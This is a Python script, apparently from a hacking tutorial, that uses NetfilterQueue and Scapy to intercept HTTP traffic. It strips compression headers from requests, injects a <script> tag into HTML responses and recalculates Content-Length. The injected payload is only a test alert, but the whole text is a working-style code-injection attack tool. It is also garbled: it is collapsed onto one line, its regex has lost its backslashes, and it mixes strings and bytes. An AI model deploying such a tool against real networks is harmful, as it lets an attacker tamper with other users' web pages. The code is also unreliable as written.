Recalculating Content-Length:
#!/usr/bin/env python import re from netfilterqueue import NetfilterQueue from scapy.layers.inet import TCP, IP from scapy.packet import Raw def set_load(packet, load): packet[Raw].load = load del packet[IP].len del packet[IP].chksum del packet[TCP].chksum return packet def process_packet(packet): scapy_packet = IP(packet.get_payload()) # scapy_packet.show() if scapy_packet.haslayer(Raw): load = scapy_packet[Raw].load if scapy_packet[TCP].dport == 80: print("[+] Request") load = re.sub(b"Accept-Encoding:.*?\r\n", b"", load) elif scapy_packet[TCP].sport == 80: print("[+] Response") injection_code = b"<script>alert('test');</script>" load = load.replace(b"</body>", injection_code + b"</body>") content_length_search = re.search("(?:Content-Length:s)(d*)", load) if content_length_search and "text/html" in load: content_length = content_length_search.group(1) new_content_length = int(content_length) + len(injection_code) load = load.replace(content_length, str(new_content_length)) if load != scapy_packet[Raw].load: new_packet = set_load(scapy_packet, load) packet.set_payload(str(new_packet).encode()) packet.accept() queue = NetfilterQueue() queue.bind(0, process_packet) try: queue.run() except KeyboardInterrupt: print('')